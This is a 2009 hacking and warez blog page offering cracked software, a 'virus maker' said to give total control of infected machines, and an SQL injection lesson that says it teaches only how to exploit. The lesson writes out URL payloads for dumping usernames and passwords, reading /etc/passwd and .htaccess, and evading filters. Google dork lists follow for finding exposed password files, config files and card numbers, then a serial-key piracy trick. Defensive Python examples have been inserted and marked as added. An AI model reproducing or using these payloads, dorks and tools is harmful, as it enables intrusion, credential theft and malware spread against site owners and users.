We have moved to http://access-xperia.blogspot.com

ATX: If you are a reader of this blog, I encourage you to visit and join ATX. This blog will not be discontinued, but all the recent updates will be on ATX. ATX brings you a more exciting look, more premium software for free and, of course, a chance to win invitations to some selected sites.

Visit and read ACCESS THE XPERIA

Resource site of Computer software, Phone application, E-books, Programming codes, yahoo tools, tutorials, hacking tools, keylogger, trojan, hacking, MP3 and much more. ::CORE™::

Saturday, August 29, 2009

XP Password Manager


Easiest way to recover XP Password
--DOWNLOAD LINK--

JPS Virus Maker v3.0

http://aka-core.blogspot.com/2009/08/kaspersky-2010-and-keys.html
This is the most dangerous of all hacking tools as it allows complete and total control of the infected computer

DOWNLOAD LINK::

Nero 9 micro -Auto Registered-

Nero 9 is a simple-to-master but powerful program for recording CDs and DVDs, and now Blu-ray and HD DVD, with an intuitive user interface. It can burn discs in all of the current standards, including audio and video CDs. Files on your computer, as well as other CDs, can serve as the source for recording.

installation build (14 August)
-autoregistration implemented

languages :
English (EN)
Greek (ELL)
Deutsche (DEU)
Dutch (NLD)
Spanish (ESP)
French (FRA)
Italian (ITA)
Russian (RUS)
Turkish (TRK)

DOWNLOAD HERE

...::SQL Injection Attacks::...


::What is SQL Injection?::
-SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as: "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
::Background Information::
-It is considered the most common web vulnerability today
-It's a flaw in the web application--not the db, or the server
-Can be injected into: Cookies, Forms, and URL parameters
::Lesson Facts::
-This lesson uses MySQL syntax for all examples.
-This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
-This lesson only provides SQL injection examples for URL parameters, since it is such a large subject on its own
-This lesson gives small examples of filter evasion techniques
::The Lesson::
-Some commands you will need to know:
'union all select': combines two or more select statements into one query and returns all rows
'order by': used to sort rows after a select statement is executed
'load_file()': loads a local file from the site or server; examples would be .htaccess or /etc/passwd
'char()': used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()': combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'--': a comment
'/*': another type of comment
-Injecting SQL Queries into URL Parameters
So you've found a site: 'http://www.site.com/index.php?id=5', and want to test if it's vulnerable to SQL Injections.
1) Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site.
Otherwise, if a blank page showed up you just might be in luck!
2) Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error, decrement the number 20; if there is no error, continue incrementing until you get one. The number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16 <--returns an error, then we know that there are 15 columns in our select statement.
3) The next statement will null the id=5 so the script only executes our commands and not its own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- <--The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.
4) Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--
As you can see, we selected values from the showing columns. What if we want to clean this up a bit and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--
Now look at your page: user(), database(), and version() are all in one place, and are separated by a colon. This demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere; in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database in use--but only if you're a skiddy!
5) Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
-/index.php?id[]=
-You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
-"Session Cookie Trick" <--Thanks to haZed at enigmagroup.org. In the url type: 'javascript:void(document.cookie="PHPSESSID=");' This will give a session_start() error and an FPD.
Now we will attempt to use load_file(). This example will load the .htaccess file; make sure you know the file you're trying to load actually exists, or you may miss out on your opportunity to realize what great perms you have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for FTP. Another idea would be to load .htpasswd after finding its location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.
-Using information_schema.tables:
So you don't have load_file() perms? No problem, we can check for information_schema.tables.
1) 'table_name' is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS, you might be wondering? Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist... Then what do you think the information_schema.columns holds? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables-- <--Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns-- <--Selects all tables and columns that go with each table separated by a colon
2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say:
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
Until no more tables show, then you can do the same for the columns.
3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--
And you'll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin' <--Replacing Admin with the top user's name such as admin or owner etc..
::Final Tips::
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users-- <--If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users-- <--If you get a username, good job you guessed a correct table and column, otherwise keep guessing.
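Why the URL payloads in this lesson work, and what stops them, shown as an added example that is not part of the original article. It assumes a three-column `articles` query and uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL site; the table contents and function names are constructed for illustration.

```python
import sqlite3

ARTICLE_QUERY = "SELECT id, title, body FROM articles WHERE id = "


def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO articles VALUES (5, 'Welcome', 'Hello world');
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def page_vulnerable(db, raw_id):
    """The flaw the lesson relies on: the id parameter is pasted into the SQL text."""
    sql = ARTICLE_QUERY + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Showing database errors to the visitor is what makes the
        # 'order by N' column count and the single-quote test informative.
        return "SQL error: %s" % exc


def page_safe(db, raw_id):
    """Hardened form: strict input validation plus a bound parameter."""
    # Accept only a short run of ASCII digits; everything else is rejected
    # before it gets near the database.
    if not (isinstance(raw_id, str) and raw_id.isascii()
            and raw_id.isdigit() and len(raw_id) <= 9):
        return []
    # The value travels separately from the SQL text, so it can never
    # change the structure of the statement.
    return db.execute(ARTICLE_QUERY + "?", (int(raw_id),)).fetchall()


# Inputs of the kinds used in the lesson, shortened to this query's 3 columns.
LESSON_INPUTS = [
    "5 and 1=0--",
    "'",
    "5 order by 4",
    "null union all select 1,username,password from users--",
]

if __name__ == "__main__":
    db = make_db()
    for value in ["5"] + LESSON_INPUTS:
        print(repr(value))
        print("  vulnerable:", page_vulnerable(db, value))
        print("  safe:      ", page_safe(db, value))
```

The load_file() step additionally depends on the database account holding MySQL's FILE privilege, so the account a web application connects with should not have it. Returning a generic error page instead of the database error removes the signal that the 'order by' and single-quote tests rely on.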
::Filter Evasion Techniques::
-You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
-Rather than using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
-Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
-Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
-Be creative
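Seen from the logging side, the case and encoding tricks above are undone by normalizing a request before matching it. The following is an added example, not part of the original article: it decodes and lower-cases the query string of each access-log line and tags the probing steps this lesson describes. The log lines, rule names and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [29/Aug/2009:10:00:01 +0000] "GET /index.php?id=5 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [29/Aug/2009:10:00:03 +0000] "GET /search.php?q=trade+union+all+members HTTP/1.1" 200 900',
    '203.0.113.9 - - [29/Aug/2009:10:01:00 +0000] "GET /index.php?id=5%20and%201=0-- HTTP/1.1" 200 310',
    '203.0.113.9 - - [29/Aug/2009:10:01:04 +0000] "GET /index.php?id=5%20order%20by%2016 HTTP/1.1" 500 312',
    '203.0.113.9 - - [29/Aug/2009:10:01:09 +0000] "GET /index.php?id=null%20UniON%20aLL%20SeLECt%201,2,3,4,concat(user(),char(58),version()),6-- HTTP/1.1" 200 4100',
    '203.0.113.9 - - [29/Aug/2009:10:01:15 +0000] "GET /index.php?id=null+union+all+select+1,2,3,4,table_name,6+from+information_schema.tables-- HTTP/1.1" 200 4100',
    '203.0.113.9 - - [29/Aug/2009:10:01:21 +0000] "GET /index.php?id=null+union+all+select+1,2,3,4,load_file(char(47)),6-- HTTP/1.1" 200 4100',
]

# client address, request target, response status
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# One rule per step of the lesson; all are matched on normalized text.
RULES = {
    "boolean_probe": re.compile(r"\band\s+1\s*=\s*0\b"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "env_functions": re.compile(r"\b(?:user|database|version)\s*\(\s*\)"),
    "file_read": re.compile(r"\bload_file\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b"),
}


def normalize(query, max_rounds=3):
    """URL-decode (bounded, until stable), collapse whitespace, lower-case."""
    for _ in range(max_rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query).lower()


def classify(line):
    """Return (client, status, matched rule names) or None if unparsable."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    client, target, status = match.groups()
    _, _, query = target.partition("?")
    text = normalize(query)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return client, int(status), hits


def summarize(lines):
    """Group matched rules by client so a multi-step probe stands out."""
    by_client = defaultdict(set)
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[2]:
            by_client[parsed[0]].update(parsed[2])
    return {client: sorted(rules) for client, rules in by_client.items()}


if __name__ == "__main__":
    for client, rules in summarize(SAMPLE_LOG).items():
        print(client, rules)
```

Matching only catches what reaches the log; it complements parameterized queries in the application and does not replace them.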
::Conclusion::
Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.

Thanks to EnigMaGroup and OwasP

CORE™

Google Hacking

Google hacking at its finest..

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on)

Presented below is just a sample of interesting searches that we can send to Google to obtain info that some people might not want us having. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that I am only changing the word after the parent directory; change it to what you want and you will get a lot of stuff.

METHOD 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.

Example: ?intitle:index.of? mp3 jackson

METHOD 3

put this string in google search:

inurl:microsoft filetype:iso

You can change the string to whatever you want, e.g. microsoft to adobe, iso to zip, etc.

"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!

"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/

"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google). You must type in the query followed by the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
"http://bob:bob@www"

"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)


intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!

filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extension of a file on a webserver can have ugly consequences.
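Several of the searches above only return results when specific files sit inside a web-served directory. The following added example, which is not part of the original post, walks a document root you administer and reports those files, plus directories with no index file. The file patterns come from the searches listed above; the sample tree, the index-file set and all function names are constructed assumptions.

```python
import os
import re
import tempfile

# Filename patterns taken from the searches listed above.
RISKY_FILES = [
    (re.compile(r"^auth_user_file\.txt$", re.I), "DCForum/DCShop password file"),
    (re.compile(r"^passlist\.txt$", re.I), "password list"),
    (re.compile(r"^service\.pwd$", re.I), "FrontPage password file"),
    (re.compile(r"(htaccess|passwd|shadow|htusers).*\.bak$", re.I),
     "backup copy of an access-control file"),
    (re.compile(r"\.mdb$", re.I), "Access database"),
    (re.compile(r"\.user$", re.I), "eggdrop user file"),
]

# Assumption: the index names this server is configured to serve.
INDEX_FILES = {"index.html", "index.htm", "index.php"}
LISTING = "no index file: served as 'Index of' if directory listing is on"


def audit_docroot(root):
    """Return sorted (relative path, reason) findings for one document root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        if not ({name.lower() for name in filenames} & INDEX_FILES):
            findings.append((rel_dir.replace(os.sep, "/"), LISTING))
        for name in filenames:
            for pattern, reason in RISKY_FILES:
                if pattern.search(name):
                    rel = os.path.normpath(os.path.join(rel_dir, name))
                    findings.append((rel.replace(os.sep, "/"), reason))
                    break
    return sorted(findings)


def build_sample_docroot(root):
    """Create a small constructed tree to run the audit against."""
    sample = [
        "index.php",
        "backup/.htaccess.bak",
        "_vti_pvt/service.pwd",
        "forum/index.php",
        "forum/auth_user_file.txt",
    ]
    for rel in sample:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("constructed sample\n")


def demo():
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_docroot(root)
        return audit_docroot(root)


if __name__ == "__main__":
    for path, reason in demo():
        print("%-28s %s" % (path, reason))
```

Anything reported belongs outside the document root or behind access control; a directory listed without an index file is only exposed if the server has directory listing enabled.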

Let's pretend you need a serial number for windows xp pro.

In the google search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

CORE™

WEB HACKING


Your objective today is to crack this application. However, please try to avoid causing real damage to the site, as many people need to use it.
First steps
There are several users set up for this application with user names from aa to zz (with passwords the same as user names). There is a further user whose identity you may discover in the course of your investigations. You should use a user name that relates to your workstation ID, so if your workstation is CS206a, your user name will be aa
Try the application. See what it is supposed to do. Are there any exploits which immediately spring to mind? See what happens if you enter
instead of an email address into the optional email input box
In itself the result of doing this is mildly irritating but not especially harmful. What might a malicious user be able to do to make it more dangerous? e.g. hints 
  • JavaScript can be used to load a new page to replace the existing one

  • Bad HTML (especially in tables) can wreck a page

You may spot one or two other flaws. A good trick is to try to enter unlikely data into form fields. My personal favourite characters are the following:
? ' > < % \ | #
Note that in this application only a couple of these will cause surprising effects
Most of the application's flaws will only become obvious with a bit more probing
Looking at the HTML
Now save the form to a local directory (save it with a .html extension, then it will be easier to use).
Look at the source code. Try to work out how to give yourself a very good mark in the test
Some starting points
Your first task will probably be to modify the action of the form to point to the absolute URL of the receiving page.
Try to work out how the application allocates marks. If you think that the method used seems silly, I have seen real applications which allocated real test scores for real students which do this.
Are there any hidden fields that you might modify?
It would be a bit easier to hack if you could see the information sent from the form to the receiving page. Modify the form to use GET instead of POST. This will then allow you to play with the data sent to the page directly, rather than via the form.
More advanced
It would be a lot easier to hack if you had access to the database file. It may be possible to find out what this is called if you send some data that will cause an error. Try to work out how to do this. If you find the name of the database, download it
Content provided by SharpSoft
CORE™


Center of Reverse Engineering™ Copyright © 2009 Premium Blogger Dashboard Designed by SAER